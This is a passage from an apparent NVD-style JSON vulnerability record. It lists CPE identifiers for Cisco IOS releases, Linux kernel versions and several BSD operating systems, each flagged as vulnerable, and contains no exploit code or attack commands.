                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xk2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ez1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(23\\)sw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(28c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)eu1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2bc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2cy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(16f\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xa5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)mx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)ewa4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(22\\)ea6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(20\\)ewa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(7c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(24b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:11.1\\(17\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(14\\)w5\\(20\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(15\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(17\\)s7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(19\\)s2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(20\\)sp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(21\\)s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(26\\)s6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(25\\)w5\\(27\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0\\(2a\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0sy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.0sc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(1c\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2tpc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2x:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)yt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)t12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3jea:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(3d\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xv:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yz:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3ja:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yi1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2ze:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)eo1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)yu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(14\\)yq4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)t4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3tpc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)yg2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4sw:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yf4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)t6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2zj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(11\\)yk2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)xr3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(5e\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xd:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(6\\)t1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(9\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(9\\)t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4\\(8\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:9.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.48:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.17.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.1.89:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.2.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.49:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.34.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.52:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.55:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.11.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.35:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.33.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.41:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.42:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.52:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.59:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.5.46:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.15.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.51:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(12c\\)ev01:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(3\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(2b\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(6\\)ea2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)xv5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1\\(5\\)dc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1aa:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(1\\)xh:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.1xu:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)mc2c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)bc2h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(12\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(15\\)xr2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xb14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(2\\)xj:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(22\\)s2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(30\\)s1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)b4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(25\\)sg:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2\\(4\\)xl:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.41:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:dragonflybsd:dragonflybsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsd:bsd:4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsdi:bsd_os:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:dragonflybsd:dragonflybsd:1.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.8:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.47:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.16.29:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:bsd:bsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:1.1.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:4.4:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.2.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:2.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2so:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2sy:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2xc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.2yc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)ja1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(2\\)xe3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(8\\)ya1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)jx:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)xi4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(7\\)xi3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(6\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(4\\)xe4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3yt:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xc:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3xb:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.3\\(9a\\)bc6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:12.4xk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.21.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.23.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0.36:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.3.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
